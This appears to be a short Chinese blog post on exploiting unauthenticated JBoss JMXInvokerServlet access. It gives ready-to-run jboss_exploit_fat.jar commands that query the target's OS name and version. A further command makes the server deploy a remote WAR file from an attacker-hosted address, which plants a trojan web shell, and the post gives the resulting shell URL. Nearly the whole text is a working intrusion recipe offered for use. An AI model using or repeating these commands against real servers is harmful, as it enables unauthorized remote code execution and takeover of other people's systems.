Jboss未授权访问部署木马 利用exp
- 查看系统名称
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName
- 查看系统版本
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion
3.远程部署war
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war
获得shell地址:
www.any.com:8080/no/index.jsp
成功!
浙公网安备 33010602011771号